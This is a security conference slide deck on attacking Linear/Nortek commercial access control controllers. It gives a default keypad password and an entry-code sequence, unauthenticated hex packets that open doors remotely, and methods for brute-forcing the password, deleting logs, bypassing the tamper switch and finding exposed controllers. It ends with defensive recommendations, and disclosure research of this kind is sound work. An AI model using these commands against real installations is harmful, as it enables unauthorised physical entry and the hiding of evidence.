hacking access control systems
TRANSCRIPT
![Page 1: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/1.jpg)
Are We Really Safe?HACKING ACCESS CONTROL SYSTEMS
![Page 2: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/2.jpg)
Dennis Maldonado
Security Consultant @ KLC Consulting
Twitter: @DennisMald
Houston Locksport Co-founder http://www.meetup.com/Houston-Locksport/
![Page 3: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/3.jpg)
Agenda
Physical Access Control System
Linear Commercial Access Control Systems
Attacks Local
Remote
Demo/Tools
Device Enumeration Techniques
Recommendations
![Page 4: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/4.jpg)
Physical Access Control Systems
![Page 5: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/5.jpg)
Physical Access ControlWhat do they do?
Limiting access to physical location/resource
Secure areas using:
Doors
Gates
Elevators floors
Barrier Arms
![Page 6: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/6.jpg)
Access control systems
Keypad Entry (Entry/Directory codes)
Telephone entry
Radio receivers for remotes
Proximity cards (RFID)
Swipe cards
Sensors
Physical Access ControlHow do they work?
![Page 7: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/7.jpg)
Where are they used?
Use cases:
Gated Communities
Parking Garages
Office Buildings
Apartments
Hotels/Motels
Commercial Buildings
Recreational Facilities
Medical Facilities
![Page 8: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/8.jpg)
Doorking
![Page 9: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/9.jpg)
Chamberlain
![Page 10: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/10.jpg)
Sentex
![Page 11: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/11.jpg)
LiftMaster
![Page 12: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/12.jpg)
Nortek Security & Control/Linear Controllers
![Page 13: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/13.jpg)
![Page 14: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/14.jpg)
![Page 15: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/15.jpg)
![Page 16: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/16.jpg)
![Page 17: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/17.jpg)
![Page 18: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/18.jpg)
![Page 19: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/19.jpg)
Linear Commercial Access Control
![Page 20: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/20.jpg)
Nortek Security & Control/Linear Controllers
AE1000Plus
AE2000Plus
AM3Plus
![Page 21: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/21.jpg)
Linear Controller
Commercial Telephone Entry System
Utilizes a telephone line
Supports thousands of users
Networked with other controllers
Can be configured/controlled through a PC
Serial Connection
![Page 22: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/22.jpg)
Linear – TCP/IP Kit AM-SEK Kit (Serial-to-TCP)
Converts Serial to Ethernet
Allows Management over TCP/IP network
Allows for remote management (over the internet)
![Page 23: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/23.jpg)
Linear – Typical Installation
Serial Cable
Ethernet Cable
Management PC192.168.0.40
Serial-to-TCP192.168.0.32:46
60
AE1000Plus Controller
Ethernet Cable
Router/Switch192.168.0.0/2
4
![Page 24: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/24.jpg)
![Page 25: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/25.jpg)
Software - AccessBase2000
Add/remove users
Entry codes
Directory codes
Cards
Transmitters
Manually toggle relays
View log reports
Communicates through serial
Requires a password to authenticate
![Page 26: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/26.jpg)
![Page 27: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/27.jpg)
![Page 28: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/28.jpg)
PC to Controller Communication
Request
5AA5000A1105010008000000CB97
Response
Acknowledged:5AA50004110C4625
Not Acknowledged: 5AA50005110D024C23
Invalid Checksum: 5AA50005110D017EB8
No response (not authenticated)
5AA5000A11013635343332319A71
5AA50005110D024C23
![Page 29: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/29.jpg)
5AA5000A11013635343332319A71
Packet Header
Minimum Data Length
Maximum Data Length
Data(Hex)
Checksum
Net Node
Command{ Password = 01 Poll Status = 02 Poll Log = 03 Command = 04 Time = 05 Put Flash = 06 …}
String is Hex Encoded
![Page 30: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/30.jpg)
AttacksLOCAL AND REMOTE ATTACKS
![Page 31: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/31.jpg)
So how do we target these controllers?
Physical Access
Local Programming
Serial port inside the controller
![Page 32: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/32.jpg)
Local Attacks
![Page 33: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/33.jpg)
AE-500 – Default Password
Hold 0 and 2 on the keypad
Type the default password: 123456#
Input the commands to add a new entry code
31#9999#9999#99#
Type in your new code (9999)
Access Granted!
![Page 34: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/34.jpg)
123456#31#9999#9999#99#Enter
Programming Mode
Enter Entry Code
Confirm New Entry
Code
Exit Programming
Mode
New Entry Code
![Page 35: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/35.jpg)
![Page 36: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/36.jpg)
Master Key
Same key for all AE1000plus, AM3plus controllers
Purchase them from a supplier or on eBay
Or just pick the lock
Full access to the device
![Page 37: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/37.jpg)
Physical Access
Manual Relay Latch buttons
Toggle Relay
Lock their state
![Page 38: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/38.jpg)
Physical Access
Manual Relay Latch buttons
Toggle Relay
Lock their state
Programming buttons
Program device locally
Erase Memory
Active Phone Line
Serial connection to the controller
![Page 39: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/39.jpg)
Tamper Monitoring?
Magnetic tamper switch inside enclosure
No active alerts
Can be bypassed by placing a magnet on the outside of the enclosure
![Page 40: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/40.jpg)
![Page 41: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/41.jpg)
So how do we target these controllers?
Physical Access
Local Programming
Serial port inside the controller
![Page 42: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/42.jpg)
So how do we target these controllers?
Physical Access
Local Programming
Serial port inside the controller
Internal Network Access IP of Serial to TCP device
TCP Port 4660
External Network Access
IP of Serial to TCP device
TCP Port 4660 open to the internet
5AA5000A11013635343332319A71
5AA50005110D024C23
Bad Guy
5AA5000A11013635343332319A71
5AA50005110D024C23
192.168.0.32:4660
74.12.x.x:4660
![Page 43: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/43.jpg)
Remote Attacks
![Page 44: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/44.jpg)
Demo
![Page 45: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/45.jpg)
Brute-force attack
No rate limiting
No password lockout
Small key space
Exactly 6 characters
Numeric only
Scriptable
![Page 46: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/46.jpg)
Demo
![Page 47: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/47.jpg)
No Password Necessary
Authentication not enforced!
Send unauthenticated commands
Any commands will execute
May not get any confirmation data
HackerRaw Connection AE1000Plus
Controller
![Page 48: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/48.jpg)
Open Doors Remotely
Send one simple command 5AA5000A1105010000080000E88D
Triggers a relay for 2 seconds thus opening a door or gate
Great for movie style scenes
5AA5000A1105010000080000E88D
HackerRaw Connection AE1000Plus
Controller
Door 1Access
Granted
![Page 49: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/49.jpg)
Lock Doors Open/Closed
Keeps Doors/Gates open or closed
Will not respond to user input (RFID cards, remotes, etc)
Persist until manually unlocked or rebooted
![Page 50: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/50.jpg)
Delete Logs From The Controller
Controller keeps logs of events
Downloading logs deletes them from the controller
Hide evidence of entry or tampering
![Page 51: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/51.jpg)
Change the Password
Upload configuration settings
Change password without needing the previous password
Normal functionality remains
Upload other configuration changes
![Page 52: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/52.jpg)
Denial of Service
Fake database update will disable controller connected to or rebooted
Overwrite device firmware
Lock relays to prevent access
![Page 53: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/53.jpg)
ACAT – Access Control Attack Tool Demo
![Page 54: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/54.jpg)
Locating Controllers
![Page 55: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/55.jpg)
Device Enumeration Techniques Scan the network
Look for any COM port redirectors
Default port = TCP 4660
Send broadcast packet to UDP 55954
Devices will respond
Send a password request string to port 4660
5AA5000A11013635343332319A71
5AA50004110C4625
5AA50005110D024C23
5AA5000A11013635343332319A71
5AA50005110D024C23UDP Broadcast
Broadcast Response
Client Response
![Page 56: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/56.jpg)
Demo
![Page 57: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/57.jpg)
Recommendations
Always change the default password
Change physical locks
Use a direct serial connection
If networked, utilize authentication
Resist opening the controller to the internet
![Page 58: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/58.jpg)
Final Thoughts
Other vendors
Ongoing research
Tool – More work is needed Tool located on https://github.com/linuz/Access-Control-Attack-Tool
It’s currently just a prototype
Continue updating it/take it out of “PoC mode”
Working on an Nmap script
Slides uploaded to SlideShare
www.slideshare.net/DennisMaldonado5
![Page 59: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/59.jpg)
Questions?
If you have any questions, you can: Twitter: @DennisMald
Find me here at DEFCON23
Email me at: [email protected]